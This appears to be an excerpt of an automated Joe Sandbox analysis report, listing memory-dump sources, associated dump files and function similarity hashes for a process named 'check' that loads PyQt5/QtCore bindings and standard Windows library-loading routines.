                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_Thread$?sender@Object@@RestoreSave
                                                                                                                                                                                                                • String ID: QConcatenateTablesProxyModel$qtcore_qobject_sender$sender$sender(self) -> Optional[QObject]
                                                                                                                                                                                                                • API String ID: 10903585-2901892199
                                                                                                                                                                                                                • Opcode ID: f3607248f61e0e24077420eebd8c9464bd77104ee4d7c41e48494f2af05d5c7c
                                                                                                                                                                                                                • Instruction ID: 7aed3db20f93a2c82d7e93f9c4377c6320c7e08773111e0e8ace032fc37ab5d0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3607248f61e0e24077420eebd8c9464bd77104ee4d7c41e48494f2af05d5c7c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D2107B5A09B4681DF40EF25E898BA973A4FB48BD0F994032CA4D17B24EF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?inherits@Bool_DeallocFromLongObject@@
                                                                                                                                                                                                                • String ID: BAA$QObject$inherits$inherits(self, classname: Optional[str]) -> bool
                                                                                                                                                                                                                • API String ID: 1467173173-3489770634
                                                                                                                                                                                                                • Opcode ID: 54611aa49b3412757d4ef0d85f06aa28cc4b2cbe1cbc53608c5ea2a678e1a09e
                                                                                                                                                                                                                • Instruction ID: bb9c06913db729a76668a67859d62e5eedb203df5dae5ec0f4681848e777ee48
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54611aa49b3412757d4ef0d85f06aa28cc4b2cbe1cbc53608c5ea2a678e1a09e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F110AB6A09F46C1DB409F35E888AAD33A9FB88B91F950036CA5D13724DF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Array@@ByteEval_Thread$?disconnect@D01@Err_Object@@RestoreSaveString
                                                                                                                                                                                                                • String ID: disconnect() of all signals failed
                                                                                                                                                                                                                • API String ID: 2939058159-3048511396
                                                                                                                                                                                                                • Opcode ID: 40c2a1def944421ee3e5658f0b6590c95962209ca821550add3e7e2f8a7e98f3
                                                                                                                                                                                                                • Instruction ID: 6233d5aa814ceb8318a4429145544d5549026053f228e8dfd08a60c9c2f06fe3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40c2a1def944421ee3e5658f0b6590c95962209ca821550add3e7e2f8a7e98f3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 060144A1F09A5285E7009B76F858B3A6361EF88FC5B4C5031DE4E23B68EE7DD4958708
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setBool_Data@FromHeaderLongModel@@Orientation@ProxyQt@@TransposeVariant@@
                                                                                                                                                                                                                • String ID: BiEJ1|i$QTransposeProxyModel$setHeaderData$setHeaderData(self, section: int, orientation: Qt.Orientation, value: Any, role: int = Qt.ItemDataRole.EditRole) -> bool
                                                                                                                                                                                                                • API String ID: 363046316-1552214484
                                                                                                                                                                                                                • Opcode ID: 32df20297e8699901c83d3f583d9545531c1993f667edd79ea98a6751f56d781
                                                                                                                                                                                                                • Instruction ID: be607e20bdea3b82b62df2698a1213b29f5bfc69dfffa7bf641ee4223ac6ea7a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32df20297e8699901c83d3f583d9545531c1993f667edd79ea98a6751f56d781
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E413CB6609F45C9DB508F35E4847A937A8FB48B88F580136EA8D13B28EF7DD158C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF60B12DF7A,?,?,?,00007FF60B12DC6C,?,?,?,00007FF60B12D869), ref: 00007FF60B12DD4D
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF60B12DF7A,?,?,?,00007FF60B12DC6C,?,?,?,00007FF60B12D869), ref: 00007FF60B12DD5B
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF60B12DF7A,?,?,?,00007FF60B12DC6C,?,?,?,00007FF60B12D869), ref: 00007FF60B12DD85
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF60B12DF7A,?,?,?,00007FF60B12DC6C,?,?,?,00007FF60B12D869), ref: 00007FF60B12DDF3
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF60B12DF7A,?,?,?,00007FF60B12DC6C,?,?,?,00007FF60B12D869), ref: 00007FF60B12DDFF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                • Instruction ID: 3ddaa71d33a9d571ab7db4882a259b19ead3310faeb24ab07f1519a2a26dc2f1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2231D021B1AA0691EE129B12E8006B523A4FF4DBACF698575DD1FC73E0EF3CE8548300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setBool_Data@FromIndex@@ListLongModelModel@@StringVariant@@
                                                                                                                                                                                                                • String ID: BJ9J1|i$QStringListModel$setData$setData(self, index: QModelIndex, value: Any, role: int = Qt.EditRole) -> bool
                                                                                                                                                                                                                • API String ID: 2727119336-3341728503
                                                                                                                                                                                                                • Opcode ID: 807d06f06de27e99877801bb73f9a577fb457a4e843d68d8e5c4f0c95b6e2de0
                                                                                                                                                                                                                • Instruction ID: 1d07d900553d5d70242db48befbddd77369eef0a84bc3d15d91aa87b79c27db1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 807d06f06de27e99877801bb73f9a577fb457a4e843d68d8e5c4f0c95b6e2de0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46412EB6609B81C5EB608F25F4847AA77A4FB88B84F444136DACC53B68EF7CD148CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?indexCaretExp@@FromLongLong_Mode@1@@String@@
                                                                                                                                                                                                                • String ID: BJ1|iE$QRegExp$indexIn$indexIn(self, str: Optional[str], offset: int = 0, caretMode: QRegExp.CaretMode = QRegExp.CaretAtZero) -> int
                                                                                                                                                                                                                • API String ID: 458036046-3293175027
                                                                                                                                                                                                                • Opcode ID: d79808b206061c260db48db8a6d8a11f0b562a87b8f4143a2a069d72a1e391ee
                                                                                                                                                                                                                • Instruction ID: 5471a417896aa490f8f97400c3caaa3fe78a9ead496405016c543b27e25f7674
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d79808b206061c260db48db8a6d8a11f0b562a87b8f4143a2a069d72a1e391ee
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C31E676719B45C5DB609F25E888BAD33B4FB48B80F554136CA9D53720EF3AD958C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_Dir@@Dir@@@@@Empty@Filter@Flags@FromLong
                                                                                                                                                                                                                • String ID: B|J1$QDir$isEmpty$isEmpty(self, filters: Union[QDir.Filters, QDir.Filter] = QDir.AllEntries|QDir.NoDotAndDotDot) -> bool
                                                                                                                                                                                                                • API String ID: 1674118922-2031024265
                                                                                                                                                                                                                • Opcode ID: 4707ac5533f350888df9800dcb50ae82870063022f613b022298893ffe358e28
                                                                                                                                                                                                                • Instruction ID: 9b2cea321b9bc29fb6f1916de5ae2abe9faa24f83c5b463c4ab1a4fee3f58d9d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4707ac5533f350888df9800dcb50ae82870063022f613b022298893ffe358e28
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 863107B6B09B4585DB50CF25E4887AD33A8FB48B90F954136CAAD43720DF3DD559C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLong$?submit@AbstractModel@@Proxy
                                                                                                                                                                                                                • String ID: QAbstractProxyModel$submit$submit(self) -> bool
                                                                                                                                                                                                                • API String ID: 3425304994-209536689
                                                                                                                                                                                                                • Opcode ID: 685ce5f14e75fa4768b7575772a9ef3751261d7a32e350f3fc6c9a0b887c084f
                                                                                                                                                                                                                • Instruction ID: fcae5ae978d57dfc330b5fd3227f94181bc30874100df44d9db31297910842e7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 685ce5f14e75fa4768b7575772a9ef3751261d7a32e350f3fc6c9a0b887c084f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 822165A1A0AA8281EB409B75F4487B973A4FF84B94F4C0032DA8D17B74EF7CD098D744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • qChecksum, xrefs: 00007FFB02FA44F7
                                                                                                                                                                                                                • qChecksum(s: Optional[PyQt5.sip.array[bytes]]) -> intqChecksum(s: Optional[PyQt5.sip.array[bytes]], standard: Qt.ChecksumType) -> int, xrefs: 00007FFB02FA44EB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
